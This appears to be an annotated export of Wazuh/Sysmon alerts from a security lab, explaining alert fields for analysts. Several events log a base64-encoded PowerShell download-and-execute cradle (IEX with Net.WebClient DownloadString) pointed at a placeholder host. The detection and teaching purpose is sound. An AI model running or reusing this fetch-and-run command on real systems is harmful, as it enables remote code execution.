rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 83 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534336.1741285 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:53.8502052Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284944 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:53.827
ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ProcessId: 14828
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_owe3gjix.5wo.ps1
CreationUtcTime: 2025-04-24 22:38:53.827
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:53.827 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_owe3gjix.5wo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:53.827 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 80 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534339.1744054 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:57.2803391Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284980 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:55.073
ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ProcessId: 2520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ParentProcessId: 14828
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:55.073 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 84 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534339.1752121 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:57.6272922Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284981 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:57.575
ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ProcessId: 2520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mjeitfip.wlw.ps1
CreationUtcTime: 2025-04-24 22:38:57.569
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:57.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mjeitfip.wlw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:57.569 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 81 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534342.1754886 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:59.8050356Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285021 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:58.630
ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ProcessId: 13540
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ParentProcessId: 2520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:58.630 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 85 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534342.1762953 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:00.0401311Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285022 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:00.003
ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ProcessId: 13540
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fgj5ikc3.txg.ps1
CreationUtcTime: 2025-04-24 22:39:00.003
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:00.003 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fgj5ikc3.txg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:00.003 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
